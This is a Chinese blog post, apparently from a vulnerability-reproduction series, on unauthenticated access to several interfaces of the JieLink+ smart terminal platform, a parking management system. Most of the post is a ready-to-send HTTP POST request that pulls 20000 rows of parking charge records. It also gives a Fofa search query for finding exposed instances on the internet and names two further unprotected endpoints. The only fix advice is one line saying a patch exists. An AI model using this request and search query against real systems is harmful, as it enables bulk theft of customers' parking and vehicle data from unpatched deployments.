JieLink+智能终端操作平台多接口未授权访问

iSee857

已于 2024-08-27 17:22:34 修改

阅读量264

点赞数 4

分类专栏：漏洞复现文章标签： web安全

于 2024-08-22 14:07:04 首次发布

本文链接：https://blog.csdn.net/xc_214/article/details/141426531

版权

漏洞复现专栏收录该内容

130 篇文章 13 订阅

订阅专栏

0x01 漏洞描述：

JieLink+智能终端中多个接口存在未授权访问，导致大量敏感信息泄露，危害用户数据安全

0x02 搜索语句：

Fofa：title="JieLink+智能终端操作平台"

0x03 漏洞复现：

POST /report/ParkChargeRecord/GetDataList HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: Bearer test
Cookie: JSESSIONID=test;UUID=1; userid=admin
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://x.xx.xx.x:xxx
Connection: close
Referer: http://x.xx.xx.x:xxx/Report/ParkOutRecord/Index
Sec-GPC: 1
Priority: u=1

page=1&rows=20000

其余未授权接口

/Report/ParkCommon/GetParkInThroughDeivces

/report/ParkOutRecord/GetDataList

0x04 修复建议：

官方已发布补丁，请即时获取

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

iSee857

关注关注

4
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

漏洞复现-某智能终端操作平台前台通用SQL注入漏洞（附漏洞检测脚本）

jjjj1029056414的博客

12-12

743

漏洞复现-某智能终端操作平台前台通用SQL注入漏洞，附带自己写的poc脚本

java开源物联网_JetLinks开源物联网平台源码 v1.8.0

weixin_32541663的博客

03-01

3277

JetLinks开源物联网平台基于Java8、Spring Boot 2.x、WebFlux、Netty、Vert.x、Reactor等开发，是一个开箱即用，可二次开发的企业级物联网基础平台。平台实现了物联网相关的众多基础功能，能帮助你快速建立物联网相关业务系统。JetLinks开源物联网平台核心特性：支持统一物模型管理，多种设备，多种厂家，统一管理。统一设备连接管理，多协议适配(TCP、MQTT...

参与评论您还未登录，请先登录后发表或查看评论

MySQL账号密码忘记解决方法

jcoiwenwfkowe的博客

05-13

MySQL账号密码忘记解决方法

【复现】JieLink+智能终端操作平台弱口令漏洞_28

fushuang333的博客

01-25

860

【复现】JieLink+智能终端操作平台弱口令漏洞，JeLink+智能终端操作平台(JSOTC2016 fJeLink+)是捷顺历经多年行业经验积累，集智能硬件技术视频分析技术、互联网技术等多种技术融合，基于B/S架构，实现核心业务处理模型

JieLink+智能终端操作平台存在sql注入漏洞

3tefanie丶zhou的博客

12-15

1174

【故事是一把双刃剑。】

JieLink+智能终端操作平台存在弱口令漏洞

3tefanie丶zhou的博客

12-15

1062

07-22

momodenglu的博客

09-07

6018

1. 10pin的Jlink可以当SWD来下载数据； 2. 10pin的Jlink的RXD引脚，可以用来监听，例如，曾用Jlink的10脚RXD接到串口屏的RXD,来监听液晶屏收到的数据；曾用Jlink的10脚RXD接到串口屏的TXD,来监听液晶发出去的数据； ...

Jielink常见问题解决方案：安装、激活、抓拍与语音对讲

在"JieLink百问百答——常见问题篇"中，本文档提供了关于...这些解答针对JieLink系统的关键操作步骤、故障排查和常见问题提供了详尽的指导，帮助用户快速定位并解决遇到的技术问题，提高了系统的稳定性和用户体验。

【捷顺科技】JieLink百问百答--常见问题篇20190816.docx

07-02

【捷顺科技】JieLink百问百答--常见问题篇20190816.docx【捷顺科技】JieLink百问百答--常见问题篇20190816.docx【捷顺科技】JieLink百问百答--常见问题篇20190816.docx【捷顺科技】JieLink百问百答--常见问题篇...

2024年三个月网络安全（黑客技术）入门教程

2401_85027336的博客

09-25

2189

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的，技术上面其实有很大的重叠性，抛开甲乙方、岗位名称、岗位职责等因素来看，作为学技术的，也根据以往我们给学员推荐就业和入职情况来看，只要好好掌握以下几种技术（网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言）中的2到3个，都可以较好的胜任工作需求。

《网络安全：数字时代的坚实护盾》

一名资深Java工程师的技术分享

10-10

257

在当今高度数字化的时代，网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全，更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。

什么是网络安全

m0_66268916的博客

10-07

507

全站防护是基于风险管理和WAAP理念打造的安全方案，以“体系化主动安全” 取代安全产品的简单叠加，为各类Web、API业务等防御来自网络层和应用层的攻击，帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施，防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故，使网络处于稳定可靠运行的状态，以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面，包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行，防止数据被破坏、更改、泄露。

网络安全（黑客）自学

白帽子凯哥聊黑客

10-10

1217

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web安全技术，既有 Web 渗透，也有 Web 防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。

高效查找服务器漏洞

2401_85592408的博客

10-07

397

11. 使用专业工具：可以使用如OSV-Scanner、Sqlmap、Wapiti、ZAP、CloudSploit、Firmwalker、Nikto2、OpenSCAP等专业工具来检测不同类型的漏洞。3. 服务识别：识别运行在开放端口上的服务及其版本，这可以通过Nmap的版本检测功能或Metasploit的辅助模块来完成。1. 信息收集：首先需要收集目标服务器的相关信息，包括开放的端口、运行的操作系统、应用程序及其版本等。12. 持续监控：安全是一个持续的过程，需要定期重复上述步骤来检测新出现的漏洞。

网络安全（黑客）——自学2024